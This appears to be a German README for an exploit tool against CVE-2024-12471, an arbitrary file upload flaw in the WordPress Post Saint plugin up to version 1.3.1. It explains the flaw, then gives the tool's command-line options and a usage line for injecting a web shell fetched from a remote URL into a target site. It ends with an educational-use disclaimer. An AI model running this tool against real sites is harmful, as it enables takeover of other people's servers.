
Post Saint <= 1.3.1 Plugin für WordPress Beliebiger Datei-Upload
Post Saint <= 1.3.1 Plugin für WordPress Beliebiger Datei-Upload
Das Post Saint Plugin für WordPress (Versionen bis einschließlich 1.3.1) ist aufgrund fehlender Berechtigungsprüfungen und Dateitypvalidierung anfällig für beliebige Datei-Uploads. Authentifizierte Angreifer mit mindestens Abonnenten-Zugriff können diese Schwachstelle ausnutzen, um beliebige Dateien hochzuladen, was möglicherweise zur Remote-Codeausführung führt.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Dieses Skript dient nur zu Bildungs- und Forschungszwecken. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal und unethisch.